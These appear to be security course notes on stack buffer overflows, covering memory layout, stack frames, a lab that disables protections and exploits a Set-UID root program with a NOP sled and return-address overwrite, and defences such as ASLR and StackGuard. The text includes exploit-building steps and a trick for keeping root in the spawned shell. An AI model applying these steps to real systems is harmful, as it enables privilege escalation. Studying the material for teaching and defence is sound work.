6_Buffer_Overflow
To fully understand how buffer overflow attacks work, we need to understand how data is arranged inside a process.
Take the following C code:
#include <stdlib.h>

int x = 100; // Data segment
int main(){
    int a = 2; // Stack
    float b = 2.5; // Stack
    static int y; // BSS
    int* ptr = (int*) malloc(2*sizeof(int)); // Heap (the pointer ptr itself lives on the stack)
    ptr[0]=5; // Heap
    ptr[1]=6; // Heap
    free(ptr);
    return 1;
}
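The memory is divided into 5 segments: text, data, BSS, heap, and stack, where:
Text segment: stores the executable code of the program.
Data segment: stores static and global variables that are initialized by the programmer (x in the code above).
BSS segment: stores uninitialized static and global variables (y in the code above).
Heap: provides space for dynamic memory allocation, managed by malloc(), free(), etc.
Stack: stores local variables defined inside functions, together with data related to function calls.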
Buffer overflow can happen on both stack and heap.
We'll look at stack-based buffer overflow.
As said before, the stack is used for storing data used in function invocations.
Since a running program is essentially a sequence of function calls, there must be a way to keep track of them. Indeed, whenever a function is called, some space is allocated for it on the stack.
Consider the following sample code for function func():
void func(int a, int b){
int x, y;
x = a + b;
y = a - b;
}
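Now, when func() is called, a block of memory is allocated on the top of the stack; this block is called a stack frame.
The structure of a stack frame has four important regions:
Arguments: the values passed to the function (a and b for func()).
Return address: the address of the instruction to execute once the function finishes; it is needed (by the return instruction) to know where to return to.
Previous frame pointer: the frame pointer of the calling function.
Local variables: the variables defined inside the function (x and y for func()).
Since func() needs to access the arguments and the local variables, it has to know their memory addresses.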
Unfortunately, such addresses cannot be decided at compilation time, because the compiler cannot predict the run-time status of the stack.
For this reason, the CPU provides a dedicated register, called the frame pointer.
This register points to a fixed location in the stack frame, so the address of each argument and local variable can be derived from this register plus an offset.
In this way, the offset can be decided by the compiler, while the actual address of the data can change at runtime, since it depends on the frame pointer, which in turn depends on where the stack frame is allocated.
movl 12(%ebp), %eax;
movl 8(%ebp), %edx;
addl %edx, %eax;
movl %eax, -8(%ebp);
where:
ebp is the register that holds the frame pointer.
eax and edx are general-purpose registers.
a is located at ebp + 8 and b is located at ebp + 12.
x is located at ebp - 8.
Typically, functions can call other functions within their scopes. Whenever a function is called, a new stack frame is allocated on the top of the stack; when the function returns, the space for the stack frame is released. That's why we need the previous frame pointer: when a function returns, the frame pointer is restored to the caller's value, so a chain of nested function calls can be unwound correctly.
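The frame-pointer arithmetic and the chain of saved frame pointers can be mimicked with a small toy model. The following Python sketch is only an illustration: the Frame class, the starting address 0xFFFFD000, and the 32-byte frame size are assumptions made up for the example, not values taken from a real process.

```python
from dataclasses import dataclass

WORD = 4  # size of a 32-bit word in bytes


@dataclass
class Frame:
    name: str
    ebp: int        # frame pointer value for this frame
    prev_ebp: int   # saved frame pointer of the caller (0 for the first frame)

    def arg_address(self, index: int) -> int:
        # Arguments sit above the return address: ebp + 8, ebp + 12, ...
        return self.ebp + 2 * WORD + index * WORD

    def return_address_slot(self) -> int:
        # The return address is stored right above the saved frame pointer.
        return self.ebp + WORD


def call(stack: list, name: str, frame_size: int = 32) -> Frame:
    """Allocate a new frame below the current one (the stack grows downward)."""
    caller_ebp = stack[-1].ebp if stack else 0
    base = caller_ebp if stack else 0xFFFFD000  # hypothetical start of the stack
    frame = Frame(name, base - frame_size, caller_ebp)
    stack.append(frame)
    return frame


def ret(stack: list) -> int:
    """Release the top frame and return the restored frame pointer."""
    return stack.pop().prev_ebp


stack = []
main_frame = call(stack, "main")
func_frame = call(stack, "func")

# Same offsets (+8 for a, +12 for b), but the absolute addresses depend on the frame.
print(hex(func_frame.arg_address(0)), hex(func_frame.arg_address(1)))
restored = ret(stack)  # back in main: the frame pointer is main's again
print(hex(restored))
```

The offsets are constants known in advance, while the absolute addresses only exist once a frame has been placed on the stack, which is the point of addressing through the frame pointer.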
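A buffer overflow on the stack happens whenever we write past the end of a local variable and overwrite the portion of the stack above it. In this way, we modify important values such as the previous frame pointer and the return address.
In this scenario, when the function returns, the CPU jumps to whatever address now sits in the return address field: the program may crash (if the address is unmapped, protected, or does not hold valid instructions), or it may execute code chosen by the attacker.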
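The effect of such an overwrite can be reproduced on a toy frame. The sketch below models a frame as a Python bytearray; the layout (a 100-byte buffer, an assumed 8-byte gap, then the saved frame pointer and the return address) and the address 0x080484C3 are hypothetical values chosen for illustration.

```python
BUF_SIZE = 100  # size of the local buffer
GAP = 8         # assumed padding between the buffer and the saved frame pointer
WORD = 4

# Offsets inside the toy frame, counted from the start of the buffer.
SAVED_EBP = BUF_SIZE + GAP   # 108
RET_ADDR = SAVED_EBP + WORD  # 112
FRAME_LEN = RET_ADDR + WORD  # 116


def new_frame(return_address: int) -> bytearray:
    """Build a zeroed frame that holds the given return address."""
    frame = bytearray(FRAME_LEN)
    frame[RET_ADDR:RET_ADDR + WORD] = return_address.to_bytes(WORD, "little")
    return frame


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy like strcpy: stop at the first zero byte, never check the buffer size."""
    end = data.find(b"\x00")
    payload = data if end == -1 else data[:end]
    frame[0:len(payload)] = payload


def read_return_address(frame: bytearray) -> int:
    return int.from_bytes(frame[RET_ADDR:RET_ADDR + WORD], "little")


frame = new_frame(0x080484C3)          # hypothetical legitimate return address
unchecked_copy(frame, b"A" * 50)       # fits in the buffer: return address untouched
print(hex(read_return_address(frame)))
unchecked_copy(frame, b"A" * 116)      # too long: return address becomes 0x41414141
print(hex(read_return_address(frame)))
```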
Before starting the experiment, we need to turn off all the countermeasures:
sudo sysctl -w kernel.randomize_va_space=0
gcc -m32 -o stack -z execstack -fno-stack-protector stack.c
sudo chown root stack
sudo chmod 4755 stack
/* stack.c */
#include <stdio.h>
#include <string.h>
int foo(char* str){
char buffer[100];
strcpy(buffer,str); // Here there's the buffer overflow problem
return 1;
}
int main(int argc, char** argv){
char str[400];
FILE* badfile;
badfile = fopen("badfile","r");
fread(str,sizeof(char),300,badfile);
foo(str);
printf("Returned Properly\n");
return 1;
}
Since up to 300 bytes read from badfile are copied into the local variable buffer, which can store only 100 bytes, a buffer overflow will occur (strcpy() does not check the size of the destination).
So, we have to decide what to put in badfile in order to make the program continue and execute malicious code.
We place our malicious code at the end of the file and overwrite the return address field with the address of the malicious code; in this way, our code is executed when foo() returns.
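We need 2 steps:
Find the offset between the base of the buffer (the local variable of foo()) and the return address.
Find the address at which the malicious code will be placed.
To solve the first step, we use gdb to find the actual offset.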
We set a breakpoint by using
gdb$ b foo
Breakpoint 1 at 0x804848a
gdb$ run
We can now print the value of the frame pointer ebp and the address of the buffer by:
gdb$ p $ebp
$1 = (void *) 0xffffcf58
gdb$ p &buffer
$2 = (char (*)[100]) 0xffffceec
gdb$ p/d 0xffffcf58 - 0xffffceec
$3 = 108
The distance between &buffer and ebp is 108 bytes. The frame pointer points to the saved previous frame pointer, and the return address is stored 4 bytes above it, so the offset of the return address from &buffer is 108 + 4 = 112. This offset will be used to set the new return address.
The frame pointer is 0xffffcf58. Therefore the return address is stored at 0xffffcf58 + 4, and the first address where we can put the malicious code is 0xffffcf58 + 8 (look at the stack layout).
Thus, we can put the value 0xffffcf58 + 8 at buffer + 112.
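The arithmetic above can be double-checked with a few lines of Python. This is just a sketch that reuses the two addresses printed by gdb in this session; the variable names are chosen for the example.

```python
WORD = 4  # 32-bit addresses

ebp = 0xFFFFCF58          # value printed by `p $ebp`
buffer_addr = 0xFFFFCEEC  # value printed by `p &buffer`

dist_to_saved_ebp = ebp - buffer_addr  # distance from the buffer to the saved frame pointer
ret_offset = dist_to_saved_ebp + WORD  # offset of the return address field from the buffer
first_code_addr = ebp + 2 * WORD       # first address above the return address field

print(dist_to_saved_ebp, ret_offset, hex(first_code_addr))
```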
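We create the badfile with a Python script.
The script will:
Fill the content with NOP instructions (0x90).
Place the shellcode at the end of the content.
Write the new return address at offset 112.
Save the content to badfile.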
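# shellcode is assumed to be a bytes object holding the machine code to execute (not shown here)
content = bytearray(0x90 for i in range(300))  # 300 NOPs, matching the 300 bytes read by fread()
start = 300 - len(shellcode)
content[start:] = shellcode  # shellcode at the end of the file
ret = 0xffffcf58 + 200
content[112:116] = (ret).to_bytes(4, byteorder='little')  # overwrite the return address field
with open('badfile', 'wb') as f:
    f.write(content)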
Here we put the new return address ret at offset 112. Since x86 is a little-endian architecture, the address must be stored least significant byte first, which is what to_bytes with byteorder='little' does.
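To see what the byte order means in practice, the short sketch below prints the same address in both orders. It only uses the address from the script; the comparison with struct.pack is added as a cross-check and is not part of the original script.

```python
import struct

ret = 0xFFFFCF58 + 200  # 0xffffd020

little = ret.to_bytes(4, byteorder="little")
big = ret.to_bytes(4, byteorder="big")

print(little.hex())  # 20d0ffff: least significant byte first
print(big.hex())     # ffffd020

# struct.pack with "<I" (little-endian unsigned 32-bit) gives the same bytes.
assert little == struct.pack("<I", ret)
```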
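Notice: we have used a larger offset for ret (200 instead of 8). This accounts for the fact that gdb may push some additional data onto the stack, so the addresses seen under gdb can differ from those of a normal run; since the content is filled with NOPs, any address that lands in the NOP region before the shellcode works.
Notice: the result of 0xffffcf58 + nnn must not contain a zero in any of its bytes, otherwise strcpy inside foo will stop copying early.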
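The zero-byte constraint is easy to check before building the file. The helper names below (has_zero_byte, usable_offsets) are made up for this sketch; only the frame pointer value comes from the gdb session.

```python
def has_zero_byte(address: int) -> bool:
    """True if any of the four bytes of a 32-bit address is 0x00."""
    return 0 in address.to_bytes(4, byteorder="little")


def usable_offsets(ebp: int, start: int, stop: int, step: int = 4) -> list:
    """Offsets n in [start, stop) for which ebp + n contains no zero byte."""
    return [n for n in range(start, stop, step) if not has_zero_byte(ebp + n)]


ebp = 0xFFFFCF58
print(has_zero_byte(ebp + 200))  # 0xffffd020 -> False, safe to use
print(has_zero_byte(ebp + 168))  # 0xffffd000 -> True, strcpy would stop here
print(usable_offsets(ebp, 160, 176))
```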
And that’s it: the attack succeeds.
There are several countermeasures:
Use safer functions, such as strncpy(), strncat(), etc.
Another countermeasure is address space layout randomization: by randomizing the start location of the stack every time the code is loaded in memory, the stack address changes from run to run.
Thus, it is difficult for the attacker to guess the stack address in memory and, therefore, it is difficult to guess the %ebp address and the address of the malicious code.
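The effect of randomization on a fixed guess can be illustrated with a small simulation. This is a toy model, not a measurement: the stack base is treated as one of 2**entropy_bits equally likely slots, and the entropy values used below are arbitrary assumptions.

```python
import random


def hit_rate(entropy_bits: int, attempts: int, seed: int = 0) -> float:
    """Fraction of runs in which a fixed guess matches a randomized stack base.

    The stack base is modelled as one of 2**entropy_bits equally likely slots.
    """
    rng = random.Random(seed)
    slots = 2 ** entropy_bits
    guess = 0  # the attacker always bets on the same slot
    hits = sum(1 for _ in range(attempts) if rng.randrange(slots) == guess)
    return hits / attempts


print(hit_rate(0, 1000))   # no randomization: the guess is always right
print(hit_rate(10, 1000))  # 1024 possible slots: the guess is rarely right
```

The more bits of entropy the randomization provides, the more attempts a brute-force attacker needs on average.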
On Linux we can control it with:
sudo sysctl -w kernel.randomize_va_space=0   # disable randomization
sudo sysctl -w kernel.randomize_va_space=1   # randomize the stack
sudo sysctl -w kernel.randomize_va_space=2   # randomize the stack and the heap
Since in a 32-bit machine, the stack base address can have
Since the stack-based buffer overflow needs to modify the return address, if we can detect such a change, we can foil the attack.
We know that to overwrite the return address we have to overwrite all the stack memory between the buffer and the return address.
So, we can put a non-predictable value (called guard) between the buffer and the return address. If this value has been modified, chances are that the return address has also been modified.
We could do it manually in our code, but this countermeasure (StackGuard) is already implemented in gcc, which is why we compiled with -fno-stack-protector.
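The guard idea can be sketched on a toy frame. The code below is a simplified Python model, not how gcc implements it: the frame layout, the helper names, and the address 0x080484C3 are assumptions for illustration.

```python
import secrets

BUF_SIZE = 100
WORD = 4
GUARD = BUF_SIZE         # the guard sits right after the buffer
RET_ADDR = GUARD + WORD  # the return address sits after the guard


def new_frame(return_address: int, guard: bytes = None):
    """Build a toy frame and return it together with its secret guard value."""
    if guard is None:
        guard = secrets.token_bytes(WORD)  # unpredictable for the attacker
    frame = bytearray(RET_ADDR + WORD)
    frame[GUARD:GUARD + WORD] = guard
    frame[RET_ADDR:RET_ADDR + WORD] = return_address.to_bytes(WORD, "little")
    return frame, guard


def guard_intact(frame: bytearray, guard: bytes) -> bool:
    """Check performed before returning: has the guard been modified?"""
    return bytes(frame[GUARD:GUARD + WORD]) == guard


frame, guard = new_frame(0x080484C3)  # hypothetical return address
frame[0:50] = b"A" * 50               # in-bounds write: the guard is untouched
print(guard_intact(frame, guard))

frame[0:len(frame)] = b"A" * len(frame)  # overflow that reaches the return address
# The check now fails unless the random guard happened to be b"AAAA".
print(guard_intact(frame, guard))
```

Because the overflow has to cross the guard to reach the return address, checking the guard before returning is enough to notice the attack in this model.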
bash & dash
We know that bash and dash drop privileges when they detect that the effective UID is not equal to the real UID. So, even though stack is a root-owned Set-UID program, a shell started by the malicious code would not run with root privileges.
However, this can be easily defeated by setting the real UID to 0, simply by invoking setuid(0) at the beginning of the shellcode.